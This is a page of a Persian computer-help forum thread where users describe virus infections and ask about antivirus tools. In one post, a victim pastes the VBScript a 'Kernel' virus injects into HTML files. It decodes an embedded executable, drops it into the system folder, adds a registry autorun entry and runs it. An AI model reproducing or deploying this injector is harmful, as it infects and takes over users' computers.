تبلیغات :
خرید لپ تاپ استوک
ماهان سرور
آکوستیک ، فوم شانه تخم مرغی ، پنل صداگیر ، یونولیت
دستگاه جوجه کشی حرفه ای
فروش آنلاین لباس کودک
خرید فالوور ایرانی
خرید فالوور اینستاگرام
خرید ممبر تلگرام

[ + افزودن آگهی متنی جدید ]




صفحه 86 از 215 اولاول ... 367682838485868788899096136186 ... آخرآخر
نمايش نتايج 851 به 860 از 2144

نام تاپيک: مشکلات آلوده شدن سیستم به ویروس ها و اسپای ور ها ( ابتدا پست اول را ببینید )

  1. #851
    داره خودمونی میشه mbsh's Avatar
    تاريخ عضويت
    Nov 2006
    پست ها
    123

    پيش فرض

    amintnt سلام
    برای پست 778 که جواب منو داده بودید یه سئوال داشتم خواهشا کمکم کنید.( چون دیدم شما هم قبلا این ویروسو داشتید)
    من نورتن نصب کردم با آپدیتاش و ویروسای تو فلشمو پاک کرده ولی مشکلم اینه که من یه سری از اطلاعاتمو زده بودم روی سی دی و حالا که می خوام اونا ویروساشونو پاک کنم و مطالب قبلیشو هم ریکاور کنم نمی شه چون روی سی دیه. در ضمن پوشه هاش هم همه مخفی ان و وقتی هم می خوام همشو کپی کنم تو یکی از درایوام تا بعد هم ویروساش پاک بشه و هم ریکاورشون بکنم پیام می ده که نمی تونم. در نتیجه فعلا عملا فایلام از دست رفتند و من نمی دونم چی کار کنم.
    راستی من نمی دونم که با recover my files دقیقا باید چه طوری کار کنم. و در ضمن می خواستم بدونم با توجه به این که من ویندوزمو عوش کردم آیا بازم امکان برگشت اون فایلا و عکسا وجود داره؟
    خیلی ممنون می شم اگه کمکم کنید.

  2. #852
    پروفشنال Booseh_ye_Irani's Avatar
    تاريخ عضويت
    Nov 2006
    محل سكونت
    تهران
    پست ها
    549

    پيش فرض

    با سلامي دوباره
    خسته نباشيد

    همون طور كه گفتيد من «Kaspersky AntiVirus 7.0.0.125» رو تهيه و راه اندازي كردم، ولي بدبختانه نتونستم يك «Rescue Disk» بسازم. يعني بلد نبودم.


    لطف كنيد و راه ساختن Rescue Disk و استفاده از اون رو براي من و ديگران آموزش بديد.
    از شما ممنونم.

    با يكي دو تا AntiVirus يا AntiSpyيي كه داشتم نتونستم Virus يا Spy دستگاهم رو پيدا كنم و اين من رو نگران كرده، چون مي دونم روي دستگاهم ويروس يا تروجاني مخفيانه مشغوله!!! اگه راهي به نظرتون مي رسه بگيد.

    ممنون از شما و همكارانتون، خسته نباشيد و خداحافظ
    آدينه، 22 تير 1386

  3. #853
    حـــــرفـه ای vtn54's Avatar
    تاريخ عضويت
    Oct 2005
    پست ها
    1,794

    پيش فرض

    با سلامي دوباره
    خسته نباشيد

    همون طور كه گفتيد من «Kaspersky AntiVirus 7.0.0.125» رو تهيه و راه اندازي كردم، ولي بدبختانه نتونستم يك «Rescue Disk» بسازم. يعني بلد نبودم.


    لطف كنيد و راه ساختن Rescue Disk و استفاده از اون رو براي من و ديگران آموزش بديد.
    از شما ممنونم.

    با يكي دو تا AntiVirus يا AntiSpyيي كه داشتم نتونستم Virus يا Spy دستگاهم رو پيدا كنم و اين من رو نگران كرده، چون مي دونم روي دستگاهم ويروس يا تروجاني مخفيانه مشغوله!!! اگه راهي به نظرتون مي رسه بگيد.

    ممنون از شما و همكارانتون، خسته نباشيد و خداحافظ
    آدينه، 22 تير 1386
    سلام دوست عزیز

    من در یک تاپیک توضیحاتی در این مورد داده ام و لینک آن را هم در پست قبلی برایتان گذاشتم سری به لینک زیر

    بزنید باز اگر مشکلی بود من در خدمتم .اگر به مشکل برخوردید بگویید دقیقا مشکلتان در این موردچیست تا بشود

    کمکتان کرد.

    [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

  4. #854
    پزشک انجمن S0R3N4's Avatar
    تاريخ عضويت
    Feb 2006
    محل سكونت
    حزب نازی
    پست ها
    6,329

    پيش فرض


    یدونه عکس از پروسه های فعال سیستمت رو اینجا بزار تا بشه بهتر نظر داد. در ضمن این دو تا پروسه هم توش باشن.
    همونطور که توی عکس هم می بینید دو پروسه اولی اونهایی هستند که مشکوک می زنند و نمی شه قطعشون کرد.
    در ضمن من تمام پروسه های اضافی رو (در واقع اونهایی که می شد بسته بشن) رو قبل از گرفتن عکس بستم. البته باید اضافه کنم که همه پروسه هایی که بسته شده اند برای من شناخته شده هستند.



    یه چیز دیگه ای که امروز بهش برخوردم اینه که حتی با استفاده از برنامه هایی مثل WinNC یا Nero هم نمی تونم فایهای مخفی رو ببینم چون winNC سریعاً بسته می شه و File Browser برنامه Nero هم پیغام خطا می ده!!! locked.gif

    من به عمرم ویروس به این کَنه ای ندیده بودم. کم کم دارم شک می کنم که...

    راستی با برنامه WinPatrol توی استارت آپ عنوان این دو پروسه به صورت زیر نشون داده می شه:
    bptnsvr : yreghlp.exe
    ulmasjm : wbegdwp.exe

    و در ضمن با این برنامه WinPatrol هم نمی شه این دو تا پروسه رو از توی استارت آپ حذف کرد. چون وقتی حذفشون می کنم بلافاصله دوباره میان

  5. #855
    آخر فروم باز Creeping Death's Avatar
    تاريخ عضويت
    May 2006
    محل سكونت
    Where The Wild Thing Are
    پست ها
    1,314

    پيش فرض مشکل با ویروس Kernel

    سلام

    ببینید کامپیوتر من هر چند وقت یکبار ویروسی به نام kernel می گیرد که

    ۱ - CPU Use را صد در صد می کند .

    ۲ - یه سری کد به همه ی فایل های html اضافه می کند و حجم آ نها را چند برابر می کند و اگه زودتر درستش نکنم وقتی فایل ها را باز کنم آن ها را خودکار پاک می کند .

    با هر آنتی ویروسی هم سعی کرده ام برای مدتی پاک شده ولی فایل های html درست نشده .

    این کد ها را اضافه می کند:

    <script language=vbscript>

    on error resume next

    fileexe1="0770901440000030000000000040000000002552 55000000184000000000000000000000064000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000001840000000 00014031186014000180009205033184001076205033084104 10511503211211411110311409710903209909711011011111 60320981010321141171100321051100320680790830321091 11100101046013013010036000000000000000000000212036 14202814406922407914406922407914406922407903009024 30791350692240791081012420791470692240790821050991 04144069224079000000000000000000000000000000000000 00000000000008006900000007600100300008111504706900 00000000000000000000002240000150010110010050120000 02000000000030006000000000000000007017000000000016 00000000003200000000000006400000001600000000000200 00000040000000000040000000000040000000000000000000 00000080006000000004000000139039000000002000000000 00000001600000001600000000000001600000001600000000 00000000000160000000000000000000000000000000000680 32000000100000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000320000000680000000000000000000000000 00000000000000000000000000000000000000000000000000 00000004611610112011600000000024000100000000001600 00000000020000000000040000000000000000000000000000 00000000000000032000000096046114100097116097000000 25000100000000003200000000000200000000000600000000 00000000000000000000000000000000000640000000640461 00097116097000000000128027006000000048000000000002 00000000000800000000000000000000000000000000000000 00000640000001920000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000106000106000106000 10600110600023220700100000016311207507000010600010 40000000001281060001060001040410480640002550531120 75070000232181001000000163116075070000104120075070 00010412802600600010424004806400025505311607507000 02321560010000001040040010000001041240750700002322 31000000000104028048064000104124075070000232244000 00000010400001600000010408804806400010412407507000 02322020000000001632240480640001060001042280480640 00255053120075070000104240048064000255053224048064 00023217400000000025505322404806400023214500000000 02550531120750700002320320010000002550531160750700 00232021001000000106005106000106000104124075070000 10600010600023207300000000019508513923613119622810 60001060001060001410692280802320630000000000111921 16020141069228080232062000000000141069228080232035 00000000023521720119510400001606400010422414700400 01060001060002320240000000002321852552552551952550 37020032064000255037040032064000255037036032064000 25503703203206400025503702803206400025503700003206 40002550370120320640002550370080320640002550370040 32064000204204204204204204204204204204085139236087 25511700823203600000000013912500813907701200324805 12100511921380040101360040581311940011321921172430 95139069008201194008000204204204085139236139069008 13123200413119200412805600011604812812000100011603 21281200020001160161281200030001172300430690081311 92003201194004000043069008131192002201194004000043 06900813119200120119400400004306900820119400400025 50370600320640002550370480320640002550370520320640 00255037056032064000000000000000000000000000000000 00000000000000000008603300000013403300000012203300 00001000330000000000000000002360320000000000000000 00054033000000042033000000028033000000008033000000 00000000000018203300000019803300000021803300000016 00330000000000000000001880320000000000000000000000 00000000252032000000020032000000196032000000000000 00000000000000000007403300000002803200000016803200 00000000000000000000000000001460330000000000320000 00216032000000000000000000000000000000238033000000 04803200000000000000000000000000000000000000000000 00000000000000000000000860330000001340330000001220 33000000100033000000000000000000236032000000000000 00000005403300000004203300000002803300000000803300 00000000000000001820330000001980330000002180330000 00160033000000000000000000103000083104101108108069 12010109911711610106500011510410110810805105004610 01081080001400000681051151120971160991040771011151 15097103101065000000025001071101116077101115115097 10310106500002300208310111608410510910111400000006 60020841140971101151080971161010771011151150971031 01000000117115101114051050046100108108000000026000 06710811111510107209711010010810100006000107110111 60831211151161011090681051141010991161111141210650 00202001079112101110070105108101000000158002087114 10511610107010510810100010710111411010110805105004 61001081080000001050000731101161011141101011160671 08111115101072097110100108101000134000073110116101 11411010111607911210111006500013500007311011610111 41101011160791121011100851141080650000001420000731 10116101114110101116082101097100070105108101000000 11910511010511010111604610010810800000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000092083121115 11610110911504610112010100010411611611205804704710 40490461141051121190971210460991111090471001141010 97109104097099107047072047078097118105100104097099 10704610112010100000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000"

    dim sys

    Set df = document.createElement("object")

    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "

    set fso = df.createobject("Scripting.FileSystemObject","")

    set s=df.CreateObject("Shell.Application.1","")

    set re=df.createobject("wscript.shell","")

    sys=fso.GetSpecialFolder(1)

    For a = 1 To Len(filevbs1) Step 3

    filevbs2=filevbs2 & chr(mid(filevbs1,a,3))

    if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))

    next

    kr = UCase(re.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows\CurrentVersion\Run\Microsoft Windows"))

    fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1

    if ucase(fso.FileExists(sys & "\Kernel.exe"))="FALSE" or kr<>ucase(sys & "\KERNEL.EXE") then

    re.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run\" & "Microsoft Windows" ,sys &"\Kernel.exe"

    fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2

    s.Open (sys & "\Kernel.exe")

    end if

    fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1

    if fso.opentextfile(sys & "\Systemv.dll",1).readall<>"on" then

    fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2

    s.Open (sys & "\Kernel.vbs")
    Last edited by Creeping Death; 14-07-2007 at 19:21.

  6. #856
    پروفشنال parinaz571's Avatar
    تاريخ عضويت
    Jun 2006
    پست ها
    664

    پيش فرض

    سلام
    ایا فایل unins000.dat ویروس است؟

  7. #857
    آخر فروم باز Creeping Death's Avatar
    تاريخ عضويت
    May 2006
    محل سكونت
    Where The Wild Thing Are
    پست ها
    1,314

    پيش فرض

    کسی نمی تونه کمکم کنه؟

  8. #858
    در آغاز فعالیت
    تاريخ عضويت
    Mar 2007
    پست ها
    3

    14 مشكله ريست شدن

    با سلام.كامپيوتر من . وقتي به نت وصل مي شم 2 يا 3 بار ريست مي كنه بعد خاموش مي شه ؟كسي ميتونه كمكم كنه؟ البته Nod32 هم نصبه.با تمامي تنظيمات

  9. #859
    اگه نباشه جاش خالی می مونه dkhx2000's Avatar
    تاريخ عضويت
    Jan 2007
    محل سكونت
    جنوبی ترین نقطه استان فارس
    پست ها
    376

    پيش فرض

    چه جالب من همیشه فکر می کردم این فایل یکی از فایل های نود 32 هستش که اینجور cpu رو سرویس می کنه
    چون که هروقت نود رو پاک کردم اون فایل هم رفته دنبال کار خودش یعنی ناپدید شده
    البته این فایل روی همه ی سیستم هایی که نود نصب می کنم میاد ولی روی بعضی از اونا اینجوری اذیت می کنه
    جالب تر هم اینه که نود جدید که اومده همونقدر که روی بعضی از سیستم ها خوب کار می ده روی بعضی از سیستم ها رو هم که نصب می کنم دیگه بالا نمی یاد

    شما برای امتحان که شده این ویروس کش رو پاک کن ببین مشکلت حل میشه خدا رو چه دیدی

  10. #860
    آخر فروم باز Creeping Death's Avatar
    تاريخ عضويت
    May 2006
    محل سكونت
    Where The Wild Thing Are
    پست ها
    1,314

    پيش فرض

    من اصلا تا به حال nod 32 را نصب نکرده ام . یعنی چندبار خواسته ام نصب کنم با اون این ویروس را بکشم ولی گیرم نیامده ...

Thread Information

Users Browsing this Thread

هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)

User Tag List

قوانين ايجاد تاپيک در انجمن

  • شما نمی توانید تاپیک ایحاد کنید
  • شما نمی توانید پاسخی ارسال کنید
  • شما نمی توانید فایل پیوست کنید
  • شما نمی توانید پاسخ خود را ویرایش کنید
  •